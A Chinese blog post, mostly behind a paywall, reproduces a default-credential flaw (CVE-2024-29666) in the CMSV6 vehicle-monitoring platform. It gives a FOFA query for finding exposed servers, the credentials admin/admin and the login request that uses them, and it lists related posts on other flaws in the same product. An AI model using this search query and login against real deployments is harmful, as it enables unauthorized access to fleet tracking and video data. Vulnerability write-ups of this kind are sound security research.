【漏洞复现】通天星CMSV6 admin 弱口令漏洞(CVE-2024-29666)

最新推荐文章于 2024-07-30 12:44:42 发布

从不学安全

最新推荐文章于 2024-07-30 12:44:42 发布

阅读量811

点赞数 11

分类专栏：漏洞复现文章标签：安全网络

本文链接：https://blog.csdn.net/qq_67810151/article/details/137148873

版权

漏洞复现专栏收录该内容

99 篇文章 35 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文详细介绍了通天星CMSV6在7.31.0.2和7.32.0.3版本中的弱口令漏洞，该漏洞允许未授权攻击者通过特定弱口令获取后台管理员权限，影响到GPS运营商、车辆硬件制造商和车队管理企业的数据安全。

摘要由CSDN通过智能技术生成

0x01 产品简介

CMSV6平台是基于车辆位置信息服务和实时视频传输服务的创新技术和开放运营理念。为GPS运营商车辆硬件设备制造商、车队管理企业等车辆运营相关企业提供核心基础数据服务。

0x02 漏洞概述

CMSV6 7.31.0.2、7.32.0.3版本中存在弱密码漏洞，未授权的攻击者可以通过弱口令登录后台，获取管理员权限。

0x03 测绘语句

fofa: body="/808gps/"

0x04 漏洞复现

用户名：admin 密码：admin



GET /StandardApiAction_login.action?account=admin&password=admin HTTP/1.1

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

从不学安全

关注关注

11
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

通天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞复现

0xSec

06-24

1008

2024年5月，通天星CMSV6发布新版本修复了一处SQL注入漏洞。漏洞是由于通天星CMSV6车载定位监控平台未对用户的输入进行预编译，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。该漏洞可通过SQL注入实现文件写入进行远程代码执行，获取服务器权限。建议及时修复漏洞。

通天星CMSV6车载视频监控平台disable接口处存在SQL注入漏洞 [附POC]

薛定谔嘚喵博客

07-23

314

通天星CMSV6车载视频监控平台disable存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

参与评论您还未登录，请先登录后发表或查看评论

通天星CMSV6车载定位监控平台sql注入漏洞复现

热门推荐

Battery的博客

09-23

12万+

CVE-2022-25578是Taocms v3.0.2中存在的一个安全漏洞，该漏洞允许攻击者通过任意编辑.htaccess文件来执行代码注入攻击。Taocms是一个完善支持多数据库（Sqlite/Mysql）的CMS网站内容管理系统，是国内最小且功能完善的基于php+SQLite/Mysql的CMS管理系统。该系统体积小、速度快，包含文件管理、数据采集、Memcache整合、用户管理等强大功能，且跨平台运行，支持SAE、BAE云服务，以及阿里云虚拟主机。

通天星-CMSV6-list-信息泄露（含批量验证poc）

weixin_43567873的博客

04-15

126

通天星-CMSV6-list-信息泄露（含批量验证poc）

【漏洞复现】通天星-CMSV6-mobileaction-download-文件读取

知黑而守白

01-24

145

[HCTF 2018]admin 1 弱口令和爆破解法

hintll的博客

04-04

606

[HCTF 2018]admin 继续buu刷题，几天刷到一道比较有意思的题： [HCTF 2018]admin 打开环境之后右上角点击login 既然题目名字都提示了admin 猜测就是弱口令 admin加123 试一下直接就登录进去了但是这道题绝对没有这么简单正常应该是先试一下sql注入但是，这道题并没有注入漏洞那就抓包爆破试一下爆破密码：发现长度不一样的就是密码这是第一种解法 ...

【漏洞复现】通天星CMSV6车载视频监控平台 disable存在SQL注入

weixin_54799594的博客

07-26

994

漏洞复现过程中的笔记

【漏洞复现】鸿运(通天星CMSV6车载)主动安全监控云平台存在敏感信息泄露漏

失心少年

02-27

376

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！鸿运(通天星CMSV6车载)主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控，保障IT系统安全、稳定、可靠运行。

弱口令安全&弱口令字典

weixin_54882883的博客

07-11

3421

首先啊，字典网上很多，想要优质的，需要自己搞了，那么弱口令的资源这么找呢，比如社工他的历史账户密码，等等网上有很多这个可以查看到一个人的历史账户密码，撞库什么的，我这里就不告诉就拉，等一下擦边擦破了。当然不是只要弱口令就能成功的，一般弱口令成功的高低取决与字典的优质性，字典越优质，对于破解工作来说越好，首先弱口令需要跑大量的请求数据，一但对方目标的服务器太辣鸡的，很容易会被跑崩，这时候就难搞咯。这里说字典，通俗一点来说就是两个文件，一个文件存在着大量的用户账户，另一个存在的大量的密码。...

【漏洞复现】通天星-CMSV6-inspect_file-upload-文件上传

知黑而守白

03-27

306

通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMS系统 upload 接口存在一个任意文件上传漏洞，该漏洞使得攻击者可以在受影响的系统上上传恶意文件，潜在风险包括远程执行恶意代码、访问敏感数据，以及其他危险操作。

【复现】通天星CMS 安全监控云平台 SQL注入漏洞_64

fushuang333的博客

03-16

639

【复现】通天星CMS 安全监控云平台 SQL注入漏洞，攻击者未经授权可以访问数据库中的数据，盗取用户的隐私以及个人信息，造成用户的信息泄露。

【漏洞复现】通天星CMSV6车载监控平台getImage任意文件读取漏洞

晚风不及你

03-04

850

深圳市通天星科技有限公司，是一家以从事计算机、通信和其他电子设备制造业为主的企业。通天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交通上。

【漏洞复现】通天星-CMSV6-standardapiaction-vehicletts-sql注入

知黑而守白

01-24

247

通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS接口存在一个SQL注入漏洞。